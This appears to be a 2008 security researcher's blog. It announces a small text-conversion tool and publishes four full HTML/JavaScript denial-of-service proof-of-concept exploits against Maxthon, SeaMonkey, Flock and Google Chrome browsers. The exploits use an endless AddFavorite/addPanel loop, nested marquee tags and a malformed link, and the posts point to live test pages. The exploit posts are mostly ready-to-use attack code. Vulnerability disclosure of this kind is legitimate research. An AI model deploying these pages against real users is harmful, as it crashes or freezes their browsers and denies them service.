15 September, 2008

CoolCon v0.2 Released




Released my Cool Converter :P "CoolCon v0.2" written in C language, 862 lines of code with a nice interface and new features added.

Conversion from Text to: Binary, Decimal, Octal, Hexadecimal, ASCII, ROT13(vice versa)
Conversion from Decimal to: Binary, Octal, Hexadecimal
Conversion from Binary to: Decimal, Octal, Hexadecimal
Conversion from Text to URL Unicode UTF-8 (new).

Included: ASCII table and Base64 table output

I know i said that the new version will have base64 conversion and vigenere cipher but..no time so enjoy and till next release ;)

CoolCon v0.2 Download link: http://www.packetstormsecurity.org/Win/CoolCon0.2.rar

t00t :D

09 September, 2008

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

<!--

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

Summary: Maxthon Browser is a powerful tabbed browser built for
all users. Besides basic browsing functionality, Maxthon Browser
provides a rich set of features to improve your surfing experience.

Product web page: http://www.maxthon.com

by Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com

http://www.zeroscience.org

09.09.2008

-->


<html>

<title>Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC</title>

<head>

<body>

<script type="text/javascript">

alert("Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC\n\n\t\tby LiquidWorm");

function thricer()
{
title="Attack";

url="http://www.thrice.net/";

if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}

else if( window.external )
{
window.external.AddFavorite( url, title);
}

else if(window.opera && window.print)
{
return (true);
}
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true)
{
for (x=0; x<x+1; x++)

thricer();
}

else
{
alert("Allrighty Then!");

window.location.href = "http://www.disneyland.com";
}

</script>

</body>

</head>

</html>


http://www.packetstormsecurity.org/filedesc/maxthon-dos.txt.html
http://www.milw0rm.com/exploits/6434
http://www.securityfocus.com/bid/31098
http://www.zeroscience.org/codes/maxthon_dos.txt

Test: CLICK (warned)

07 September, 2008

SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

<!--

Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.

Product web page: http://www.seamonkey-project.org/

Desc: SeaMonkey suffers from a remote denial of service
vulnerability (DoS), using a special html file with the
<marquee> tag multiple times (>24). Successfully exploiting
these issues allows remote attackers to cause the application
to freeze, denying service to legitimate users.

Tested on Microsoft Windows XP SP2 (English)

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com

http://www.zeroscience.org

08.09.2008

-->

<html>

<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>

<head>

<body>
<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />

<center>

<script type="text/javascript">

document.write("<kbd>Wooow Camel..!! WOW!</kbd>");

function t00t()
{
for(i=0; i < 25; i++)
{
document.write("<marquee>");
}
}

alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");

var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (b0x == true)
{
t00t();
}

else {
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}

</script> </center> </body> </head> </html>

http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html
http://www.securityfocus.com/bid/31070

Test: http://www.zeroscience.org/codes/seamonkey_dos.html

Photoshop Session No.5

06 September, 2008

Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit



http://www.milw0rm.com/exploits/6391

http://www.packetstormsecurity.org/filedesc/flockweb-dos.txt.html

http://www.securityfocus.com/bid/31044/

Test: http://www.zeroscience.org/codes/flock_dos.html

PoC follows:
-------------------------------------------------

<!----------------------------------------------0
||
| Flock Web Browser 1.2.5 Remote DoS Exploit|
| |
| by Gjoko 'LiquidWorm' Krstic|
| |
| http://www.zeroscience.org|
| |
| liquidworm [t00t] gmail.com|
| |
| 06.09.2008|
| |
0----------------------------------------------->


<html>

<title>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</Title>

<head>

<br /><br />

<center><h1><strong><kbd>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</kbd></strong></h1>

<br /><h2><kbd>Freezed/Locked - Not Responding...</kbd><h2></center>

<body>

<script type="text/javaScript">


function Xploit()
{
title="DoS";
url="http://www.destr0y.net";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}

else if( window.external )
{
window.external.AddFavorite( url, title);
}

else if(window.opera && window.print)
{
return (true);
}
}

for (n=0; n<n+1; n++)

Xploit();


</script>

<center>
<a href="http://www.zeroscience.org/codes/flock_dos.html"><i>http://www.zeroscience.org/codes/flock_dos.html</i></a>
</center>

</body> </head> </html>

<!-- thanks to Gianni Amato -->

------------------------------------------

05 September, 2008

Google Chrome Browser 0.2.149.27 Denial of Service Exploit



Test: http://zeroscience.org/codes/goodos.html

http://packetstormsecurity.org/filedesc/google-chrome-dos2.txt.html

<!-----------------------------------------------
| |
| Vulnerability discovered by Rishi Narang |
| |
| Exploit by LiquidWorm, September 2008 |
| |
| http://www.zeroscience.org |
| |
| liquidworm [t00t] gmail.com |
| |
------------------------------------------------>

<html>

<title>Google Chrome DoS Exploit</title>

<head>

<br />
<br />

<script type="text/javascript">

alert("Google Chrome Browser 0.2.149.27 Denial of Service Exploit");

var box = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (box == true)
{
document.write("Just point to the hyperlink... <a href=\"jox:%\"><strong>HERE</strong></a>");
}

else { alert("Ok Dude!"); window.location.href = "http://www.zeroscience.org"; }

</script>

</head>

</html>